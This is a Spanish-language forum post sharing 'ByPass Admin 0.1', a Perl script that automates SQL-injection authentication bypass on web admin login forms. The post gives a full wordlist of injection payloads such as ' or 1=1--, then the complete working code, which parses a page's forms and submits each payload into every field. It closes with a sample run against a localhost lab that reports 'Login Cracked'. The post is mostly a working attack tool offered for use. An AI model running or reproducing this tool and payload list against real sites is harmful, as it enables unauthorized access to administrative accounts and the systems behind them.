Acabo de terminar un programa que eh estado haciendo estos ultimos 3 dias , se trata de un script hecho en Perl para realizar los famosos y miticos bypass en los paneles de
administracion , lo bueno es que parsea todos los formularios encontrados en la pagina marcada para que todo sea mas automatico.
El programa depende de un archivo de texto llamado bypass.txt
admin'--
'or'1'='1
'or'
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
- ' or 'x'='x
- ' or 'x'='x
'or'1 ou 'or''='
' or 'x'='x
admin' or 1==1
' OR "='
'or'1'='1
El codigo (formateado con perltidy) es
#!usr/bin/perl
#ByPass Admin 0.1
#Coded By Doddy H
use LWP::UserAgent;
use HTML::Form;
my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);
head();
start();
copyright();
sub start {
print "\n\n[+] Admin : ";
chomp( my $url = <STDIN> );
my $code = toma($url);
my @testar = HTML::Form->parse( $code, "/" );
$count = 0;
foreach my $test (@testar) {
$count++;
print "\n\n -- == Form $count == --\n\n";
if ( $test->attr(name) eq "" ) {
print "[+] Name : No Found" . "\n";
}
else {
print "[+] Name : " . $test->attr(name) . "\n";
}
print "[+] Action : " . $test->action . "\n";
print "[+] Method : " . $test->method . "\n";
print "\n-- == Input == --\n\n";
@inputs = $test->inputs;
foreach $in (@inputs) {
print "\n[+] Type : " . $in->type . "\n";
print "[+] Name : " . $in->name . "\n";
print "[+] Value : " . $in->value . "\n";
}
}
print "\n\n[+] Form to crack : ";
chomp( my $op = <stdin> );
print "\n[+] Submit : ";
chomp( my $aca = <stdin> );
print "\n[+] Options to check\n\n";
print "1 - Positive\n";
print "2 - Negative\n";
print "3 - Automatic\n\n";
print "[+] Option : ";
chomp( my $op2 = <stdin> );
my @bypass = loadword();
if ( $op2 eq "1" ) {
print "\n[+] String : ";
chomp( my $st = <stdin> );
print "\n\n[+] Cracking login....\n\n";
for my $by (@bypass) {
chomp $by;
my $code = load( $url, $code, $op, $aca, $by );
if ( $code =~ /$st/ig ) {
cracked( $url, $by );
}
}
print "\n[+] Finished\n";
}
if ( $op2 eq "2" ) {
print "\n[+] String : ";
chomp( my $st = <stdin> );
print "\n\n[+] Cracking login....\n\n";
for my $by (@bypass) {
chomp $by;
my $code = load( $url, $code, $op, $aca, $by );
unless ( $code =~ /$st/ig ) {
cracked( $url, $by );
}
}
print "\n[+] Finished\n";
}
if ( $op2 eq "3" ) {
print "\n\n[+] Cracking login....\n\n";
my $prueba_falsa = load( $url, $code, $op, $aca, "fuck you" );
for my $by (@bypass) {
chomp $by;
my $code = load( $url, $code, $op, $aca, $by );
unless ( $code eq $prueba_falsa ) {
cracked( $url, $by );
}
}
print "\n[+] Finished\n";
}
}
sub load {
my ( $url, $code, $op, $aca, $text ) = @_;
$op--;
my @probar = ( HTML::Form->parse( $code, "/" ) )[$op];
for my $testa (@probar) {
if ( $testa->method eq "POST" ) {
my @inputs = $testa->inputs;
for my $in (@inputs) {
if ( $in->type eq "submit" ) {
if ( $in->name eq $aca ) {
push( @botones_names, $in->name );
push( @botones_values, $in->value );
}
}
else {
push( @ordenuno, $in->name, $text );
}
}
my @preuno = @ordenuno;
push( @preuno, $botones_names[0], $botones_values[0] );
my $codeuno = $nave->post( $url, \@preuno )->content;
return $codeuno;
}
else {
my $final = "";
my $orden = "";
my $partedos = "";
my @inputs = $testa->inputs;
for my $testa (@inputs) {
if ( $testa->name eq $aca ) {
push( @botones_names, $testa->name );
push( @botones_values, $testa->value );
}
else {
$orden .= '' . $testa->name . '=' . $text . '&';
}
}
chop($orden);
my $partedos = "&" . $botones_names[0] . "=" . $botones_values[0];
my $final = $url . "?" . $orden . $partedos;
$codedos = toma($final);
return $codedos;
}
}
}
sub cracked {
print "[+] Login Cracked\n\n";
print "[+] URL : $_[0]\n";
print "[+] Bypass : $_[1]\n";
savefile( "logs-bypass.txt", "[+] URL : $_[0]" );
savefile( "logs-bypass.txt", "[+] Bypass : $_[1]\n" );
copyright();
}
sub loadword {
my $file = "bypass.txt";
if ( -f $file ) {
open( FI, "bypass.txt" );
my @txts = <FI>;
close FI;
chomp @txts;
return @txts;
}
else {
print "\n\n[-] Wordlist not found\n\n";
copyright();
}
}
sub head {
print qq(
@@@@ @@@@@ @ @ @
@ @ @ @ @ @
@ @ @ @ @ @ @
@ @ @ @ @ @ @@@ @@ @@ @ @ @@@@ @@@ @@ @ @ @@
@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @
@ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @
@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@@ @ @ @@@@ @@ @@ @ @ @@@@ @ @ @ @ @ @
@
@@
);
}
sub copyright {
print "\n\n(C) Doddy Hackman 2012\n\n";
<stdin>;
exit(1);
}
sub savefile {
open( SAVE, ">>" . $_[0] );
print SAVE $_[1] . "\n";
close SAVE;
}
sub toma {
return $nave->get( $_[0] )->content;
}
#The End ?
Un ejemplo de uso
@@@@ @@@@@ @ @ @
@ @ @ @ @ @
@ @ @ @ @ @ @
@ @ @ @ @ @ @@@ @@ @@ @ @ @@@@ @@@ @@ @ @ @@
@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @
@ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @
@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@@ @ @ @@@@ @@ @@ @ @ @@@@ @ @ @ @ @ @
@
@@
[+] Admin : http://localhost/labs/bypass/primero.php
-- == Form 1 == --
[+] Name : No Found
[+] Action : /
[+] Method : POST
-- == Input == --
[+] Type : text
[+] Name : usuario
[+] Value :
[+] Type : password
[+] Name : password
[+] Value :
[+] Type : submit
[+] Name : logeo
[+] Value : Entrar
[+] Form to crack : 1
[+] Submit : logeo
[+] Options to check
1 - Positive
2 - Negative
3 - Automatic
[+] Option : 1
[+] String : exitoso
[+] Cracking login....
[+] Login Cracked
[+] URL : http://localhost/labs/bypass/primero.php
[+] Bypass : 'or'1'='1
(C) Doddy Hackman 2012
